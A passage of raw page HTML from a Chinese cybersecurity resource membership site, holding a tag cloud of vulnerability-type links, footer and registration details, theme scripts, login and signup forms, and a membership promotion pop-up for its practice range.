    </div></div></div></div></div></div><div class="widget-container"><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div></div><div class="widget-container"><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"></div></div></div><div class="zib-widget-wrap"><div class="widget-container"><div class=""><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="widget-content"><div class="zib-widget widget-tag-cloud author-tag"><a href="https://bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but c-red">龙浏览器未引用的服务路径特权升级</a><a href="https://bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but ">齿轮地理位置查询</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue-2">鼠标鼠标按钮命令注入远程</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-yellow-2">鼠标远程代码执行</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-green-2">鼠标远程代码</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-purple-2">鼠标路径遍历</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but c-red-2">鼠标本地文件包含</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-blue">鼠标未引用的服务路径</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but c-yellow">鼠标事件状态栏</a><a href="https://bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-green">鼠标</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-purple">默认错误页面跨站点脚本</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-red">默认配置远程代码执行</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but ">默认管理员凭据</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue-2">默认的调制解调器上的密码硬件远程</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-yellow-2">默认权限</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-green-2">默认权利</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-purple-2">默认弱密码编码</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-red-2">默认密码</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-blue">默认安全性硬件远程</a><a href="https://bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but c-yellow">默认和弱加密</a></div></div></div></div></div></div></main>
<div class="fluid-widget-wrap"></div><footer class="footer">
		<div class="container-fluid container-footer">
		<ul class="flex ac gap20 footer-contact-box list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://bdziyi.com" title="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库">
                    <img src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.cn/vip/2024/11/20241126051508458.jpg" white-src="https://oss.bdziyi.cn/vip/2024/11/20241126051508458.jpg" dark-src="https://oss.bdziyi.cn/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload" style="height: 40px;">
                </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.cn/vip/2024/03/20240324085635914.png">友链申请</a>
<a href="https://0v0.pro/">AI大全 集合网站</a>
<a href="https://jiangmuran.com/">JMR's Homepage</a></p><div class="footer-muted em09">Copyright © 2025 · <a href="https://bdziyi.com">棉花糖会员站</a>

<!-- 三个备案组件横排显示,去掉原 <p> 标签,使用 flex 布局 -->
<div style="display: flex; flex-wrap: wrap; gap: 1.5rem; align-items: center; margin-top: 0.5rem;">
    <!-- 1. ICP备案 -->
    <a href="https://beian.miit.gov.cn/" style="color: #fbbc05; text-decoration: none;" target="_blank">
        蜀ICP备2025159183号-1
    </a>
    
    <!-- 2. 公安备案(保留原图标和样式) -->
    <a href="https://beian.mps.gov.cn/#/query/webSearch?code=51152402000171"
       target="_blank"
       rel="noreferrer"
       style="display: inline-flex; align-items: center; text-decoration: none; color: #fbbc05;">
        <img src="https://beian.mps.gov.cn/web/assets/logo01.6189a29f.png"
             alt="公安备案图标"
             style="height: 20px; border: none; margin-right: 0.5em;">
        川公网安备51152402000171号
    </a>
    
    <!-- 3. 新增:增值电信业务经营许可证(颜色、对齐方式与前面一致) -->
    <span style="color: #fbbc05; display: inline-flex; align-items: center;">
        增值电信业务经营许可证:川B2-20260508
    </span>
</div></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.cn/vip/2025/09/20250920064037857.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg flex at hh gap6"><div  data-toggle="tooltip" title="扫码加微信">
                        <img class="lazyload" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.cn/vip/2025/09/20250920064037857.png" alt="扫码加微信-棉花糖会员站">
                        <div class="opacity8 em09 mt6 text-center">扫码加微信</div>
                    </div></div></li></ul>	</div>
</footer>
<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/vip/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/zibll/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
    <script type="text/javascript">
        window._win = {
            views: '2237',
            www: 'https://bdziyi.com',
            uri: 'https://bdziyi.com/wp-content/themes/zibll',
            ver: '9.0',
            pay_mark: '¥',
            pay_currency_unit: '元',
            imgbox: '1',
            imgbox_type: 'group',
            imgbox_thumbs: '1',
            imgbox_zoom: '1',
            imgbox_full: '1',
            imgbox_play: '1',
            imgbox_down: '1',
            sign_type: 'modal',
            signin_url: 'https://bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fbdziyi.com%2F2237%2F',
            signup_url: 'https://bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fbdziyi.com%2F2237%2F',
            ajax_url: 'https://bdziyi.com/wp-admin/admin-ajax.php',
            ajaxpager: '',
            ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
            ajax_nomore: '没有更多内容了',
            qj_loading: '1',
            highlight_kg: '1',
            highlight_hh: '1',
            highlight_btn: '1',
            highlight_zt: 'enlighter',
            highlight_white_zt: 'enlighter',
            highlight_dark_zt: 'dracula',
            upload_img_size: '3',
            img_upload_multiple: '20',
            upload_video_size: '30',
            upload_file_size: '30',
            upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|heif|heics|heifs|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|x-wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
            user_upload_nonce: '8b0eb8f32a',
            post_action_nonce: '455bb8ba8e',
            is_split_upload: '1',
            split_minimum_size: '20',
            comment_upload_img: '1',
            translate_config: '',
            i18n: {"shop_rating_very_bad":"非常差","shop_rating_bad":"较差","shop_rating_normal":"一般","shop_rating_good":"较好","shop_rating_very_good":"非常好","shop_view_list":"列表","shop_view_image":"图片","shop_quantity":"数量","shop_out_of_stock":"缺货","shop_stock":"库存: %1$s","shop_confirm_order":"确认订单","shop_remark":"备注","shop_remark_placeholder":"请输入备注","shop_fill_required":"请填写必要信息","shop_confirm":"确认","shop_address_edit":"编辑收货地址","shop_address_add":"添加收货地址","shop_address_name_ph":"收货人姓名","shop_address_phone_ph":"手机号码","shop_address_province_ph":"请输入省份","shop_address_city_ph":"请输入城市","shop_address_county_ph":"请输入区县","shop_address_detail_ph":"详细地址,如街道、门牌号等","shop_address_tag_custom_ph":"自定义标签 最多5个字","shop_custom":"自定义","shop_tag_home":"家","shop_tag_company":"公司","shop_tag_school":"学校","shop_enter_name":"请输入收货人姓名","shop_enter_phone":"请输入手机号码","shop_phone_invalid":"请输入正确的手机号码","shop_region_incomplete":"地区信息不完整","shop_enter_address":"请输入详细地址","shop_enter_email":"请输入邮箱","shop_select_address":"请选择收货地址","shop_delete_address":"确定要删除这个地址吗?","shop_delete_success":"删除成功","shop_delete_failed":"删除失败","shop_product_params":"商品参数","shop_product_service":"商品服务","shop_discount_detail":"优惠详情","shop_gift_detail":"赠品详情","shop_discount_info":"优惠信息","shop_select_option":"请选择商品选项","shop_remove_selected":"确定要移出选中商品吗?","shop_remove_item":"确定要移出该商品吗?","shop_stock_insufficient":"商品库存不足","shop_select_quantity":"请先选择购买数量","shop_mixed_pay_mode":"请勿同时选择积分和现金商品","shop_stock_low":"库存不足","shop_limit_buy":"当前商品限购%1$s件","shop_limit_cannot_buy":"当前商品限购,无法购买","shop_select_product_option":"请选择商品[%1$s]的商品选项","shop_product_stock_low":"商品[%1$s]库存不足,请调整选择","shop_product_limit_pieces":"商品[%1$s]限购%2$s件,请调整选择","shop_product_limit_none":"商品[%1$s]限购,无法购买,请调整选择","shop_update_cart_failed":"更新购物车数据失败","shop_select_field":"请选择%1$s","shop_enter_field":"请输入%1$s","shop_fill_fields":"请填写%1$s","shop_network_error":"网络错误,请稍后重试","shop_gift_auth":"认证资格","shop_gift_exp":"经验值","shop_gift_points":"积分","shop_gift_product":"商品","shop_permanent":"永久","shop_day_unit":"天","shop_discount_reduce":"立减","shop_discount_fold":"%1$s折","shop_discount_off":"%1$s折优惠","shop_limit_single":"单价","shop_limit_product":"商品","shop_limit_store":"店铺","shop_limit_cross":"跨店","shop_limit_full":"%1$s满%2$s可用","shop_vip_available":"VIP可用","shop_vip2_available":"VIP2可用","shop_auth_user_available":"认证用户可用","shop_activity_remaining":"活动仅剩","shop_countdown_ended":"已结束","shop_time_start":"开始","shop_time_end":"结束","shop_gift_section":"赠品","shop_limit_label":"限购:%1$s","shop_limit_purchased":"已限购","shop_limit_pieces":"限购%1$s件","shop_limit_no_limit":"不限购","shop_limit_unavailable":"无法购买","shop_limit_rules_title":"商品限购","shop_limit_rules_hint":"查看限购规则","shop_limit_bought":"此商品您已下单%1$s件,%2$s","shop_limit_can_buy_more":"还可购买%1$s件","shop_limit_cannot_buy_more":"已无法购买","shop_limit_can_buy":"此商品您可购买%1$s件","shop_input_quantity":"请输入数量","shop_qty_min_warning":"最少1$件","shop_qty_max_warning":"最多1$件","shop_max_purchase":"最多可购买%1$s件","shop_max_qty_exceed":"最大数量不能超过%1$s","shop_min_qty_below":"最小数量不能低于%1$s","shop_collapse_info":"收起更多信息","shop_expand_info":"展开全部信息","shop_address_title":"收货地址","shop_address_default":"默认","shop_address_set_default":"设为默认","shop_address_edit_btn":"编辑","shop_address_delete_btn":"删除","shop_address_empty":"您还没有添加收货地址","shop_address_add_now":"立即添加","shop_address_add_new":"添加新地址","shop_select_province":"选择省份","shop_select_city":"选择城市","shop_select_county":"选择区县","shop_address_tag_label":"地址标签:","shop_address_set_default_checkbox":"设为默认收货地址","shop_cancel":"取消","shop_save":"保存","shop_total_discount":"共计优惠","shop_discount_fold_unit":"折","shop_save_prefix":"省","countdown_end_time":"结束时间:","countdown_day":"天","countdown_hour":"小时","countdown_minute":"分","countdown_second":"秒","countdown_ended":"已结束","load_more":"加载更多","loading":"加载中...","confirm_unbind":"确认要解除账号绑定吗?","confirm_grant_badge":"确认要授予此徽章吗?","confirm_revoke_badge":"确认要收回此徽章吗?","confirm_clear_search":"确认要清空全部搜索记录?","like_already_post":"已赞过此文章了!","like_already_comment":"已赞过此评论了!","like_thanks":"已赞!感谢您的支持","done":"处理完成","ajax_error":"操作失败 %1$s %2$s,请刷新页面后重试","ajax_fatal_error":"网站遇到致命错误,请检查插件冲突或通过错误日志排除错误","qrcode_failed":"二维码获取失败,请稍后再试","select_max":"最多可选择%1$s个","input_max":"最大可输入1$","input_min":"最小可输入1$","search_min_chars":"请至少输入%1$s个字符","search_loading":"正在搜索,请稍候...","checkin_loading":"正在签到,请稍后...","please_wait":"请稍候","processing":"正在处理请稍后...","read_more":"展开阅读全文","confirm":"确认","confirm_action":"确认%1$s?","processing_wait":"正在处理请稍等...","operation_success":"操作成功","network_error_retry":"网络错误,请稍后重试","ajax_retry_failed":"操作失败,请刷新页面后重试","enter_field":"请输入%1$s","fill_field":"请填写%1$s","select_field":"请选择%1$s","close":"关闭","insert":"插入","send":"发送","uploading":"上传中","upload_processing":"处理中","upload_preparing":"准备中","upload_preparing_dot":"准备中...","upload_done":"已上传","upload_failed":"上传失败","permanent":"永久","points":"积分","currency_yuan":"¥","comment_confirm_delete":"确认要删除此评论吗?","comment_approve":"批准","comment_reject":"驳回","comment_pending_review":"待审核","comment_reply":"回复","comment_enter_name_email":"请输入昵称和邮箱","comment_email_invalid":"邮箱格式错误","comment_too_short":"评论内容过少","comment_hidden_after_review":"审核后通过后即可查看隐藏内容","comment_edit_content":"编辑此内容","comment_fetching_content":"正在获取内容,请稍后...","captcha_resend_in":"%1$s秒后可重新发送","agree_terms_first":"请先阅读并同意用户协议","message_all_loaded":"已加载全部","message_load_more":"继续加载","enter_code":"请输入代码","enter_valid_image_url":"请输入正确的图片地址","enter_valid_link_url":"请输入正确的链接地址","upload_format_error":"文件[%1$s]格式错误","upload_size_exceeded":"文件[%1$s]大小超过限制,最大%2$sM,请重新选择","upload_count_exceeded":"文件数量过多!最多可选择%1$s个文件","upload_select_first":"请先选择待上传的文件!","upload_unsupported":"当前浏览器不支持图片上传,请更换浏览器","captcha_retry":"请再试一次","captcha_slide_hint":"向右滑动填充拼图","captcha_load_failed":"加载失败","captcha_verify_title":"滑动以完成验证","captcha_data_failed":"滑块验证数据获取失败,网站疑似SSL或https设置有误,请对照浏览器报错进行排查","captcha_click_refresh":"点击刷新","search_enter_keyword":"请输入搜索关键词","search_keyword_short":"关键词太短,请重新输入","preview_post":"预览文章","last_saved":"最后保存:","save_success":"保存成功!","imgbox_download":"下载图片","imgbox_play":"播放图片","imgbox_view_more":"查看更多图片","imgbox_toggle_zoom":"切换图片缩放","imgbox_toggle_full":"切换全屏","week_prefix":"周","week_sun":"日","week_mon":"一","week_tue":"二","week_wed":"三","week_thu":"四","week_fri":"五","week_sat":"六","poster_load_failed":"海报加载失败","poster_generating":"正在生成图片,请稍候...","pay_alipay":"支付宝","pay_wechat":"微信支付","pay_order_timeout":"订单支付超时,请重新下单","pay_enter_coupon":"请输入优惠码","pay_discount_reduce":"优惠立减","pay_discount_off":"%1$s折优惠","pay_discount":"优惠","pay_discount_fold":"%1$s折","pay_valid_until":"有效期至","pay_coupon_available":"优惠码可用","pay_initiating":"正在发起支付,请稍后...","pay_redirecting":"正在跳转到支付页面","pay_complete":"请完成支付","pay_scan_qrcode":"请扫码支付,支付成功后会自动跳转","pay_trade_closed":"交易已关闭","pay_success_redirect":"支付成功,页面跳转中","pay_vip_loading":"加载中,请稍等...","pay_select_vip_option":"请选择会员选项","pay_order_creating":"正在生成订单,请稍候","bbs_vote_count":"%1$s票","bbs_vote_success":"投票成功","bbs_topic_posts":"帖子:%1$s"},
        }
    </script>
<script type="text/javascript">window._win.translate_config = {"auto_discriminate_local":"1","local":"chinese_simplified","ignore_text":["zibll","\u68c9\u82b1\u7cd6"],"service_use":"client.edge","loading":"","service_url":"","s":true};</script><div class="float-right round position-bottom scroll-down-hide"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><a rel="nofollow" class="newadd-btns float-btn add-btn btn-newadd" href="https://bdziyi.com/posts-edit"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg></a><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.cn/vip/2025/07/20250709061853399.jpg"  alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTopTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20 search-close-box"><button class="but cir" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p>
        <p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p>
        <p class="placeholder k1" style="height: 80px;"></p>
        </div></div></div></div>    <div class="modal fade" id="u_sign" tabindex="-1" role="dialog">
        <div class="modal-dialog" role="document">
            <div class="sign-content">
                <div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.cn/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库"></div>                <div class="sign zib-widget blur-bg relative">
                    <button class="close" data-dismiss="modal">
                        <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg>                    </button>
                    <div class="text-center"><div class="sign-logo box-body"><img src="https://bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.cn/vip/2024/03/20240324080312906.png" white-src="https://oss.bdziyi.cn/vip/2024/03/20240324080312906.png" dark-src="https://oss.bdziyi.cn/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload"></div></div>                    <div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号?立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="slider" type="hidden" name="captcha_mode" value="slider" slider-id=""><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fbdziyi.com%2F2237%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fbdziyi.com%2F2237%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号,立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="slider" type="hidden" name="captcha_mode" value="slider" slider-id=""><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="699ec7ea6f" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://bdziyi.com/privacy-policy/">隐私声明</a></div></div></div>                </div>
            </div>
        </div>
    </div>
<div class="modal fade" id="rewards-modal-1" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini rewards-popover" style="" role="document"><div class="modal-content"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-blue"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><i class="loading"></i></div></div></div><div class="modal-body"><ul class="flex jse mb10 text-center rewards-box"><li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li> <li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li></ul></div></div></div></div></div>    <div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog">
        <div class="modal-dialog                                                                                                                                                                         modal-mini"
            style="" role="document">
            <div class="modal-content">
                <div class="modal-body">
                    <div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body>
<p style="color: orange;">网安全量靶场无境上线,全网最便宜独立环境靶场!</p>
<p style="color: orange;">独家代码审计、网盘文件信息收集、ICP信息批量查询等功能已上线</p>
<p style="color: green;">网络安全从拥有一个资源大全开始!</p>
<p style="color: orange;">现在购买仅需99元一年!续费还享八折!</p>
</body>
</div></div>                </div>
                <div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="https://bdziyi.com/wzjs.html">详细介绍</a><a type="button" class="but radius c-green" href="https://bdziyi.com/index.php/user-sign/">注册登陆</a></div>            </div>
        </div>
    </div>
<script type="text/javascript">window.onload = function(){
        setTimeout(function () {$('#modal-system-notice').modal('show');
        $.cookie("showed_system_notice","showed", {path: "/",expires: 1});
    }, 500)};</script>    <script>
        jQuery(document).ready(function ($) {
            function handleAgreementSubmission() {
                var _user_agreement_auths = $('.auth-apply-from [name="user_agreement_auths"]');

                if (_user_agreement_auths.length && !_user_agreement_auths.is(':checked')) {
                    var _user_agreement_auths_box = _user_agreement_auths.closest('.form-check');
                    _user_agreement_auths_box.addClass('ani shake');
                    setTimeout(function () {
